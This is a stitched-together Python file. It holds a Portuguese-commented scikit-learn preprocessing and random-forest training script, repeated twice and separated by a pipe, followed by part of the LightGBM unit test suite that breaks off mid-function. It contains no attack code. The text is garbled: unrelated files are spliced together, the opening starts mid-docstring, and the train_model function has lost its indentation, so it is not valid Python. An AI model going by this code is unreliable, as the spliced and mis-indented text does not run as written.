        Same dataframe with the extra binary ``Age_mean`` column.
    """
    mean_age_positives = int(df.groupby(['class'])['Age'].mean()[1])
    logger.info(f'A média de idade dos pacientes positivos é de {mean_age_positives} anos')
    # Fix: reuse the precomputed mean instead of re-running the groupby
    # aggregation once per row inside the comprehension.
    df['Age_mean'] = [1 if x >= mean_age_positives else 0 for x in df.Age.values]
    return df
def featuring_select(df):
    """
    Select model features with the chi-squared ``SelectKBest`` test.

    Parameters
    ----------
    df : pandas.DataFrame
        Preprocessed dataframe (output of the dummy/age transforms).

    Returns
    -------
    df : pandas.DataFrame
        Dataframe restricted to the variables used by the model.
    chi_features : list
        Feature names selected by KBest, best scores first.
    """
    # Keep only the female indicator: 1 = female, 0 = male.
    df = df.drop(['Age', 'Gender_Male'], axis=1)
    X = df.drop('class', axis=1)
    y = df['class']
    chi_values = SelectKBest(chi2, k=11).fit(X, y)
    selected_features = pd.concat([pd.DataFrame(X.columns), pd.DataFrame(chi_values.scores_)], axis=1)
    selected_features.columns = ["features", "values"]
    selected_features = selected_features.sort_values(by="values", ascending=False).reset_index(drop=False)
    # Fix: the original nested single quotes inside a single-quoted f-string
    # (a SyntaxError on Python < 3.12) and computed the list twice; compute
    # it once and interpolate the variable.
    chi_features = selected_features["features"][0:-5].to_list()
    logger.info(f'No teste com o "chi-quadrado", as variáveis selecionadas foram {chi_features}')
    return df, chi_features
def train_model(X_train, X_test, y_train, y_test):
"""
Parameters
----------
X_train : list
Lista contendo dados explicativos de treino
X_test : list
Lista contendo dados explicativos de treino
y_train : list
Lista contendo dados do target para treino
y_test : list
Lista contendo dados do target para teste
Returns
-------
"""
params = {'n_estimators': [100, 300], 'max_depth': [2, 3, 4, 5], 'max_features': ['auto', 'sqrt', 'log2']}
logger.info('Iniciando GridSearch')
grid_search_cv = GridSearchCV(RandomForestClassifier(random_state=42), params, verbose=1, cv=5)
grid_search_cv.fit(X_train, y_train)
logger.info('GridSearch e treino do modelo finalizado')
rf_model = grid_search_cv.best_estimator_
y_pred = rf_model.predict(X_test)
target_names = ['negative', 'positive']
logger.info(f'{classification_report(y_test, y_pred, target_names=target_names)}')
feature_scores = pd.Series(rf_model.feature_importances_, index=X_train.columns).sort_values(
ascending=False).to_frame()
logger.info('Salvando modelo treinado')
with open("./models/model.pkl","wb") as f:
pickle.dump(rf_model,f)
return logger.info(f'Variáveis mais importantes no modelo {feature_scores}') | import pandas as pd
import logging
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
import pickle
from sklearn.metrics import classification_report
logger = logging.getLogger(__name__)
def columns_to_dummies(df):
    """
    Convert the dataset's string labels to binary values.

    'Positive'/'Negative' in the ``class`` target become 1/0, every
    'Yes'/'No' answer becomes 1/0, and ``Gender`` is one-hot encoded
    with ``pd.get_dummies``.

    Parameters
    ----------
    df : pandas.DataFrame
        Raw project dataframe with all used columns.

    Returns
    -------
    pandas.DataFrame
        Numeric dataframe with ``Gender_*`` dummy columns.
    """
    df['class'] = df['class'].replace({'Positive': 1, 'Negative': 0})
    df = df.replace({'Yes': 1, 'No': 0})
    return pd.get_dummies(df, columns=['Gender'])
def transform_age(df):
    """
    Binarize patient age against the mean age of positive cases.

    Adds an ``Age_mean`` column: 1 when the patient's age is at or above
    the mean age of positive (``class`` == 1) patients, else 0.

    Parameters
    ----------
    df : pandas.DataFrame
        Dataset containing at least the ``Age`` and ``class`` columns.

    Returns
    -------
    pandas.DataFrame
        Same dataframe with the extra binary ``Age_mean`` column.
    """
    mean_age_positives = int(df.groupby(['class'])['Age'].mean()[1])
    logger.info(f'A média de idade dos pacientes positivos é de {mean_age_positives} anos')
    # Fix: reuse the precomputed mean instead of re-running the groupby
    # aggregation once per row inside the comprehension.
    df['Age_mean'] = [1 if x >= mean_age_positives else 0 for x in df.Age.values]
    return df
def featuring_select(df):
    """
    Select model features with the chi-squared ``SelectKBest`` test.

    Parameters
    ----------
    df : pandas.DataFrame
        Preprocessed dataframe (output of the dummy/age transforms).

    Returns
    -------
    df : pandas.DataFrame
        Dataframe restricted to the variables used by the model.
    chi_features : list
        Feature names selected by KBest, best scores first.
    """
    # Keep only the female indicator: 1 = female, 0 = male.
    df = df.drop(['Age', 'Gender_Male'], axis=1)
    X = df.drop('class', axis=1)
    y = df['class']
    chi_values = SelectKBest(chi2, k=11).fit(X, y)
    selected_features = pd.concat([pd.DataFrame(X.columns), pd.DataFrame(chi_values.scores_)], axis=1)
    selected_features.columns = ["features", "values"]
    selected_features = selected_features.sort_values(by="values", ascending=False).reset_index(drop=False)
    # Fix: compute the selected-feature list once instead of building it
    # twice (once eagerly inside the log f-string, once for the return).
    chi_features = selected_features["features"][0:-5].to_list()
    logger.info(f'No teste com o "chi-quadrado", as variáveis selecionadas foram {chi_features}')
    return df, chi_features
def train_model(X_train, X_test, y_train, y_test):
"""
Parameters
----------
X_train : list
Lista contendo dados explicativos de treino
X_test : list
Lista contendo dados explicativos de treino
y_train : list
Lista contendo dados do target para treino
y_test : list
Lista contendo dados do target para teste
Returns
-------
"""
params = {'n_estimators': [100, 300], 'max_depth': [2, 3, 4, 5], 'max_features': ['auto', 'sqrt', 'log2']}
logger.info('Iniciando GridSearch')
grid_search_cv = GridSearchCV(RandomForestClassifier(random_state=42), params, verbose=1, cv=5)
grid_search_cv.fit(X_train, y_train)
logger.info('GridSearch e treino do modelo finalizado')
rf_model = grid_search_cv.best_estimator_
y_pred = rf_model.predict(X_test)
target_names = ['negative', 'positive']
logger.info(f'{classification_report(y_test, y_pred, target_names=target_names)}')
feature_scores = pd.Series(rf_model.feature_importances_, index=X_train.columns).sort_values(
ascending=False).to_frame()
logger.info('Salvando modelo treinado')
with open("./models/model.pkl","wb") as f:
pickle.dump(rf_model,f)
return logger.info(f'Variáveis mais importantes no modelo {feature_scores}') |
# coding: utf-8
import copy
import itertools
import math
import pickle
import platform
import random
from pathlib import Path
import numpy as np
import psutil
import pytest
from scipy.sparse import csr_matrix, isspmatrix_csc, isspmatrix_csr
from sklearn.datasets import load_svmlight_file, make_multilabel_classification
from sklearn.metrics import average_precision_score, log_loss, mean_absolute_error, mean_squared_error, roc_auc_score
from sklearn.model_selection import GroupKFold, TimeSeriesSplit, train_test_split
import lightgbm as lgb
from .utils import load_boston, load_breast_cancer, load_digits, load_iris
decreasing_generator = itertools.count(0, -1)
def dummy_obj(preds, train_data):
    """Trivial custom objective: unit gradient and unit hessian everywhere."""
    shape = preds.shape
    return np.ones(shape), np.ones(shape)
def multi_logloss(y_true, y_pred):
    """Mean negative log-likelihood of the true class under row-wise probabilities."""
    losses = [-math.log(y_pred[i][label]) for i, label in enumerate(y_true)]
    return np.mean(losses)
def top_k_error(y_true, y_pred, k):
    """Fraction of rows whose true-class score does not beat all non-top-k scores."""
    # When k covers every class, nothing can fall outside the top k.
    if k == y_pred.shape[1]:
        return 0
    # Largest score among the classes outside each row's top k.
    outside_top_k = -np.partition(-y_pred, k)[:, k:]
    max_rest = np.max(outside_top_k, axis=1)
    true_scores = y_pred[np.arange(len(y_true)), y_true]
    return 1 - np.mean(true_scores > max_rest)
def constant_metric(preds, train_data):
    """Custom eval metric that always reports zero error (higher is not better)."""
    return ('error', 0.0, False)
def decreasing_metric(preds, train_data):
    """Custom eval metric whose value strictly decreases on every call."""
    # Pulls the next value from the module-level decreasing counter.
    return ('decreasing_metric', next(decreasing_generator), False)
def categorize(continuous_x):
    """Bucket continuous values into 1%-wide bins over [0, 1)."""
    return np.digitize(continuous_x, bins=np.arange(0, 1, 0.01))
def test_binary():
    # Binary classification smoke test; also checks that 'num_iteration'
    # inside the params dict overrides num_boost_round.
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1,
        'num_iteration': 50  # test num_iteration in dict here
    }
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_test, y_test, reference=dtrain)
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=20, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    loss = log_loss(y_test, bst.predict(X_test))
    assert loss < 0.14
    assert len(history['valid_0']['binary_logloss']) == 50
    assert history['valid_0']['binary_logloss'][-1] == pytest.approx(loss)
def test_rf():
    # Random-forest boosting mode should still reach a reasonable log-loss.
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'boosting_type': 'rf',
        'objective': 'binary',
        'bagging_freq': 1,
        'bagging_fraction': 0.5,
        'feature_fraction': 0.5,
        'num_leaves': 50,
        'metric': 'binary_logloss',
        'verbose': -1
    }
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_test, y_test, reference=dtrain)
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=50, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    loss = log_loss(y_test, bst.predict(X_test))
    assert loss < 0.19
    assert history['valid_0']['binary_logloss'][-1] == pytest.approx(loss)
def test_regression():
    # Plain L2 regression; the final recorded eval must equal the
    # independently computed MSE.
    X, y = load_boston(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'metric': 'l2',
        'verbose': -1
    }
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_test, y_test, reference=dtrain)
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=50, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    mse = mean_squared_error(y_test, bst.predict(X_test))
    assert mse < 7
    assert history['valid_0']['l2'][-1] == pytest.approx(mse)
def test_missing_value_handle():
    # 20 random rows get a NaN feature and label 1: a single split on
    # "is missing" should fit this almost perfectly.
    X_train = np.zeros((100, 1))
    y_train = np.zeros(100)
    for idx in random.sample(range(100), 20):
        X_train[idx, 0] = np.nan
        y_train[idx] = 1
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_train, y_train)
    params = {
        'metric': 'l2',
        'verbose': -1,
        'boost_from_average': False
    }
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=20, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    mse = mean_squared_error(y_train, bst.predict(X_train))
    assert mse < 0.005
    assert history['valid_0']['l2'][-1] == pytest.approx(mse)
def test_missing_value_handle_more_na():
    # Same idea as test_missing_value_handle, but with NaN as the majority
    # (80 of 100 rows) to exercise the default-direction choice.
    X_train = np.ones((100, 1))
    y_train = np.ones(100)
    for idx in random.sample(range(100), 80):
        X_train[idx, 0] = np.nan
        y_train[idx] = 0
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_train, y_train)
    params = {
        'metric': 'l2',
        'verbose': -1,
        'boost_from_average': False
    }
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=20, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    mse = mean_squared_error(y_train, bst.predict(X_train))
    assert mse < 0.005
    assert history['valid_0']['l2'][-1] == pytest.approx(mse)
def test_missing_value_handle_na():
    # With zero_as_missing=False only the NaN cell is "missing"; one tree of
    # depth one must reproduce the labels exactly.
    x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
    y = [1, 1, 1, 1, 0, 0, 0, 0, 1]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_train, y_train)
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'zero_as_missing': False
    }
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=1, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    pred = bst.predict(X_train)
    np.testing.assert_allclose(pred, y)
    auc = roc_auc_score(y_train, pred)
    assert auc > 0.999
    assert history['valid_0']['auc'][-1] == pytest.approx(auc)
def test_missing_value_handle_zero():
    # With zero_as_missing=True both the 0 cell and the NaN cell count as
    # missing and must end up in the same (label 0) leaf.
    x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
    y = [0, 1, 1, 1, 0, 0, 0, 0, 0]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_train, y_train)
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'zero_as_missing': True
    }
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=1, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    pred = bst.predict(X_train)
    np.testing.assert_allclose(pred, y)
    auc = roc_auc_score(y_train, pred)
    assert auc > 0.999
    assert history['valid_0']['auc'][-1] == pytest.approx(auc)
def test_missing_value_handle_none():
    # With use_missing=False there is no special missing handling, so the
    # 0, 1 and NaN rows share predictions and the fit is only approximate.
    x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
    y = [0, 1, 1, 1, 0, 0, 0, 0, 0]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_train, y_train)
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'use_missing': False
    }
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=1, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    pred = bst.predict(X_train)
    assert pred[0] == pytest.approx(pred[1])
    assert pred[-1] == pytest.approx(pred[0])
    auc = roc_auc_score(y_train, pred)
    assert auc > 0.83
    assert history['valid_0']['auc'][-1] == pytest.approx(auc)
def test_categorical_handle():
    # One categorical column with unique category per row: with min_data=1
    # and one-hot splitting, a single iteration can memorize the labels.
    x = [0, 1, 2, 3, 4, 5, 6, 7]
    y = [0, 1, 0, 1, 0, 1, 0, 1]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_train, y_train)
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'min_data_per_group': 1,
        'cat_smooth': 1,
        'cat_l2': 0,
        'max_cat_to_onehot': 1,
        'zero_as_missing': True,
        'categorical_column': 0
    }
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=1, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    pred = bst.predict(X_train)
    np.testing.assert_allclose(pred, y)
    auc = roc_auc_score(y_train, pred)
    assert auc > 0.999
    assert history['valid_0']['auc'][-1] == pytest.approx(auc)
def test_categorical_handle_na():
    # Categorical feature alternating between 0 and NaN: the missing bucket
    # must separate the two label groups exactly.
    x = [0, np.nan, 0, np.nan, 0, np.nan]
    y = [0, 1, 0, 1, 0, 1]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_train, y_train)
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'min_data_per_group': 1,
        'cat_smooth': 1,
        'cat_l2': 0,
        'max_cat_to_onehot': 1,
        'zero_as_missing': False,
        'categorical_column': 0
    }
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=1, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    pred = bst.predict(X_train)
    np.testing.assert_allclose(pred, y)
    auc = roc_auc_score(y_train, pred)
    assert auc > 0.999
    assert history['valid_0']['auc'][-1] == pytest.approx(auc)
def test_categorical_non_zero_inputs():
    # Two non-zero category values (1 and 2) perfectly separating the labels;
    # a single split must memorize them.
    x = [1, 1, 1, 1, 1, 1, 2, 2]
    y = [1, 1, 1, 1, 1, 1, 0, 0]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_train, y_train)
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'min_data_per_group': 1,
        'cat_smooth': 1,
        'cat_l2': 0,
        'max_cat_to_onehot': 1,
        'zero_as_missing': False,
        'categorical_column': 0
    }
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=1, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    pred = bst.predict(X_train)
    np.testing.assert_allclose(pred, y)
    auc = roc_auc_score(y_train, pred)
    assert auc > 0.999
    assert history['valid_0']['auc'][-1] == pytest.approx(auc)
def test_multiclass():
    # Ten-class softmax on digits; the recorded eval must match the
    # independently computed multi-class log-loss.
    X, y = load_digits(n_class=10, return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'multiclass',
        'metric': 'multi_logloss',
        'num_class': 10,
        'verbose': -1
    }
    dtrain = lgb.Dataset(X_train, y_train, params=params)
    dvalid = lgb.Dataset(X_test, y_test, reference=dtrain, params=params)
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=50, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    loss = multi_logloss(y_test, bst.predict(X_test))
    assert loss < 0.16
    assert history['valid_0']['multi_logloss'][-1] == pytest.approx(loss)
def test_multiclass_rf():
    # Random-forest mode for the ten-class problem; looser loss bound than
    # plain gbdt since trees are bagged rather than boosted.
    X, y = load_digits(n_class=10, return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'boosting_type': 'rf',
        'objective': 'multiclass',
        'metric': 'multi_logloss',
        'bagging_freq': 1,
        'bagging_fraction': 0.6,
        'feature_fraction': 0.6,
        'num_class': 10,
        'num_leaves': 50,
        'min_data': 1,
        'verbose': -1,
        'gpu_use_dp': True
    }
    dtrain = lgb.Dataset(X_train, y_train, params=params)
    dvalid = lgb.Dataset(X_test, y_test, reference=dtrain, params=params)
    history = {}
    bst = lgb.train(params, dtrain, num_boost_round=50, valid_sets=dvalid,
                    verbose_eval=False, evals_result=history)
    loss = multi_logloss(y_test, bst.predict(X_test))
    assert loss < 0.23
    assert history['valid_0']['multi_logloss'][-1] == pytest.approx(loss)
def test_multiclass_prediction_early_stopping():
    """Prediction-time early stopping should trade accuracy for speed by margin."""
    data, target = load_digits(n_class=10, return_X_y=True)
    data_train, data_test, target_train, target_test = train_test_split(
        data, target, test_size=0.1, random_state=42)
    params = {
        'objective': 'multiclass',
        'metric': 'multi_logloss',
        'num_class': 10,
        'verbose': -1
    }
    train_set = lgb.Dataset(data_train, target_train, params=params)
    booster = lgb.train(params, train_set, num_boost_round=50)

    # A small margin stops per-row prediction early, so the loss degrades.
    predict_kwargs = {"pred_early_stop": True,
                      "pred_early_stop_freq": 5,
                      "pred_early_stop_margin": 1.5}
    loss = multi_logloss(target_test, booster.predict(data_test, **predict_kwargs))
    assert loss < 0.8
    assert loss > 0.6  # loss will be higher than when evaluating the full model

    # A larger margin keeps more iterations per row; loss approaches the full model's.
    predict_kwargs["pred_early_stop_margin"] = 5.5
    loss = multi_logloss(target_test, booster.predict(data_test, **predict_kwargs))
    assert loss < 0.2
def test_multi_class_error():
    """Check the multi_error metric and its multi_error_top_k variants.

    Verifies that the default metric equals top-k with k=1, that each k
    (1, 2, 10) matches an independent ``top_k_error`` computation, and
    that the degenerate equal-prediction case yields error 1 at k=1 and
    error 0 at k=2.
    """
    X, y = load_digits(n_class=10, return_X_y=True)
    params = {'objective': 'multiclass', 'num_classes': 10, 'metric': 'multi_error',
              'num_leaves': 4, 'verbose': -1}
    lgb_data = lgb.Dataset(X, label=y)
    est = lgb.train(params, lgb_data, num_boost_round=10)
    predict_default = est.predict(X)
    results = {}
    est = lgb.train(dict(params, multi_error_top_k=1), lgb_data, num_boost_round=10,
                    valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    predict_1 = est.predict(X)
    # check that default gives same result as k = 1
    np.testing.assert_allclose(predict_1, predict_default)
    # check against independent calculation for k = 1
    err = top_k_error(y, predict_1, 1)
    assert results['training']['multi_error'][-1] == pytest.approx(err)
    # check against independent calculation for k = 2
    results = {}
    est = lgb.train(dict(params, multi_error_top_k=2), lgb_data, num_boost_round=10,
                    valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    predict_2 = est.predict(X)
    err = top_k_error(y, predict_2, 2)
    # note: for k > 1 the recorded metric name gains an "@k" suffix
    assert results['training']['multi_error@2'][-1] == pytest.approx(err)
    # check against independent calculation for k = 10
    results = {}
    est = lgb.train(dict(params, multi_error_top_k=10), lgb_data, num_boost_round=10,
                    valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    predict_3 = est.predict(X)
    err = top_k_error(y, predict_3, 10)
    assert results['training']['multi_error@10'][-1] == pytest.approx(err)
    # check cases where predictions are equal
    X = np.array([[0, 0], [0, 0]])
    y = np.array([0, 1])
    lgb_data = lgb.Dataset(X, label=y)
    params['num_classes'] = 2
    results = {}
    lgb.train(params, lgb_data, num_boost_round=10,
              valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    assert results['training']['multi_error'][-1] == pytest.approx(1)
    results = {}
    lgb.train(dict(params, multi_error_top_k=2), lgb_data, num_boost_round=10,
              valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    assert results['training']['multi_error@2'][-1] == pytest.approx(0)
def test_auc_mu():
    """Exercise the auc_mu metric for multiclass problems.

    Covers: equivalence with binary AUC for two classes, the constant
    prediction case (0.5), sensitivity to random sample weights,
    invariance under uniform weights, a perfect-fit case (1.0), and the
    effect of the ``auc_mu_weights`` class-weight matrix.
    """
    # should give same result as binary auc for 2 classes
    X, y = load_digits(n_class=10, return_X_y=True)
    y_new = np.zeros((len(y)))
    y_new[y != 0] = 1
    lgb_X = lgb.Dataset(X, label=y_new)
    params = {'objective': 'multiclass',
              'metric': 'auc_mu',
              'verbose': -1,
              'num_classes': 2,
              'seed': 0}
    results_auc_mu = {}
    lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc_mu)
    params = {'objective': 'binary',
              'metric': 'auc',
              'verbose': -1,
              'seed': 0}
    results_auc = {}
    lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc)
    np.testing.assert_allclose(results_auc_mu['training']['auc_mu'], results_auc['training']['auc'])
    # test the case where all predictions are equal
    lgb_X = lgb.Dataset(X[:10], label=y_new[:10])
    params = {'objective': 'multiclass',
              'metric': 'auc_mu',
              'verbose': -1,
              'num_classes': 2,
              'min_data_in_leaf': 20,  # more than the 10 rows, so no split is possible
              'seed': 0}
    results_auc_mu = {}
    lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc_mu)
    assert results_auc_mu['training']['auc_mu'][-1] == pytest.approx(0.5)
    # test that weighted data gives different auc_mu
    lgb_X = lgb.Dataset(X, label=y)
    # NOTE: np.random is unseeded here, so the weights differ between runs
    lgb_X_weighted = lgb.Dataset(X, label=y, weight=np.abs(np.random.normal(size=y.shape)))
    results_unweighted = {}
    results_weighted = {}
    params = dict(params, num_classes=10, num_leaves=5)
    lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_unweighted)
    lgb.train(params, lgb_X_weighted, num_boost_round=10, valid_sets=[lgb_X_weighted],
              evals_result=results_weighted)
    assert results_weighted['training']['auc_mu'][-1] < 1
    assert results_unweighted['training']['auc_mu'][-1] != results_weighted['training']['auc_mu'][-1]
    # test that equal data weights give same auc_mu as unweighted data
    lgb_X_weighted = lgb.Dataset(X, label=y, weight=np.ones(y.shape) * 0.5)
    lgb.train(params, lgb_X_weighted, num_boost_round=10, valid_sets=[lgb_X_weighted],
              evals_result=results_weighted)
    assert results_unweighted['training']['auc_mu'][-1] == pytest.approx(
        results_weighted['training']['auc_mu'][-1], abs=1e-5)
    # should give 1 when accuracy = 1
    X = X[:10, :]
    y = y[:10]
    lgb_X = lgb.Dataset(X, label=y)
    params = {'objective': 'multiclass',
              'metric': 'auc_mu',
              'num_classes': 10,
              'min_data_in_leaf': 1,
              'verbose': -1}
    results = {}
    lgb.train(params, lgb_X, num_boost_round=100, valid_sets=[lgb_X], evals_result=results)
    assert results['training']['auc_mu'][-1] == pytest.approx(1)
    # test loading class weights
    Xy = np.loadtxt(
        str(Path(__file__).absolute().parents[2] / 'examples' / 'multiclass_classification' / 'multiclass.train')
    )
    y = Xy[:, 0]
    X = Xy[:, 1:]
    lgb_X = lgb.Dataset(X, label=y)
    params = {'objective': 'multiclass',
              'metric': 'auc_mu',
              'auc_mu_weights': [0, 2, 2, 2, 2, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0],
              'num_classes': 5,
              'verbose': -1,
              'seed': 0}
    results_weight = {}
    lgb.train(params, lgb_X, num_boost_round=5, valid_sets=[lgb_X], evals_result=results_weight)
    params['auc_mu_weights'] = []
    results_no_weight = {}
    lgb.train(params, lgb_X, num_boost_round=5, valid_sets=[lgb_X], evals_result=results_no_weight)
    assert results_weight['training']['auc_mu'][-1] != results_no_weight['training']['auc_mu'][-1]
def test_ranking_prediction_early_stopping():
    """Changing the prediction early-stop margin must change ranking outputs."""
    rank_example_dir = Path(__file__).absolute().parents[2] / 'examples' / 'lambdarank'
    X_train, y_train = load_svmlight_file(str(rank_example_dir / 'rank.train'))
    q_train = np.loadtxt(str(rank_example_dir / 'rank.train.query'))
    X_test, _ = load_svmlight_file(str(rank_example_dir / 'rank.test'))
    params = {
        'objective': 'rank_xendcg',
        'verbose': -1
    }
    train_set = lgb.Dataset(X_train, y_train, group=q_train, params=params)
    booster = lgb.train(params, train_set, num_boost_round=50)
    predict_kwargs = {"pred_early_stop": True,
                      "pred_early_stop_freq": 5,
                      "pred_early_stop_margin": 1.5}
    preds_loose_margin = booster.predict(X_test, **predict_kwargs)
    predict_kwargs["pred_early_stop_margin"] = 5.5
    preds_strict_margin = booster.predict(X_test, **predict_kwargs)
    # different margins must produce observably different predictions
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(preds_loose_margin, preds_strict_margin)
def test_early_stopping():
    """early_stopping_rounds should trigger only when enough rounds are allowed."""
    X, y = load_breast_cancer(return_X_y=True)
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1
    }
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    train_set = lgb.Dataset(X_train, y_train)
    valid_set = lgb.Dataset(X_test, y_test, reference=train_set)
    valid_set_name = 'valid_set'

    # With only 10 rounds the run completes without stopping early.
    booster = lgb.train(params, train_set,
                        num_boost_round=10,
                        valid_sets=valid_set,
                        valid_names=valid_set_name,
                        verbose_eval=False,
                        early_stopping_rounds=5)
    assert booster.best_iteration == 10
    assert valid_set_name in booster.best_score
    assert 'binary_logloss' in booster.best_score[valid_set_name]

    # With 40 rounds allowed, early stopping kicks in before the last round.
    booster = lgb.train(params, train_set,
                        num_boost_round=40,
                        valid_sets=valid_set,
                        valid_names=valid_set_name,
                        verbose_eval=False,
                        early_stopping_rounds=5)
    assert booster.best_iteration <= 39
    assert valid_set_name in booster.best_score
    assert 'binary_logloss' in booster.best_score[valid_set_name]
def test_continue_train():
    """Resuming training from a saved model file should keep improving MAE."""
    X, y = load_boston(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'regression',
        'metric': 'l1',
        'verbose': -1
    }
    train_set = lgb.Dataset(X_train, y_train, free_raw_data=False)
    valid_set = lgb.Dataset(X_test, y_test, reference=train_set, free_raw_data=False)
    first_booster = lgb.train(params, train_set, num_boost_round=20)
    model_name = 'model.txt'
    first_booster.save_model(model_name)
    evals_result = {}

    def custom_mae_feval(preds, eval_data):
        # custom eval metric mirroring the built-in l1 so both histories match
        return 'custom_mae', mean_absolute_error(preds, eval_data.get_label()), False

    booster = lgb.train(params, train_set,
                        num_boost_round=30,
                        valid_sets=valid_set,
                        verbose_eval=False,
                        feval=custom_mae_feval,
                        evals_result=evals_result,
                        init_model='model.txt')
    error = mean_absolute_error(y_test, booster.predict(X_test))
    assert error < 2.0
    assert evals_result['valid_0']['l1'][-1] == pytest.approx(error)
    # built-in l1 and the custom metric must agree round for round
    np.testing.assert_allclose(evals_result['valid_0']['l1'], evals_result['valid_0']['custom_mae'])
def test_continue_train_reused_dataset():
    """Chaining init_model runs on one Dataset should accumulate iterations."""
    X, y = load_boston(return_X_y=True)
    params = {
        'objective': 'regression',
        'verbose': -1
    }
    train_set = lgb.Dataset(X, y, free_raw_data=False)
    booster = lgb.train(params, train_set, num_boost_round=5)
    # continue three more times, 5 rounds each, always from the previous booster
    for _ in range(3):
        booster = lgb.train(params, train_set, num_boost_round=5, init_model=booster)
    assert booster.current_iteration() == 20
def test_continue_train_dart():
    """DART boosting should support resuming from an in-memory Booster."""
    X, y = load_boston(return_X_y=True)
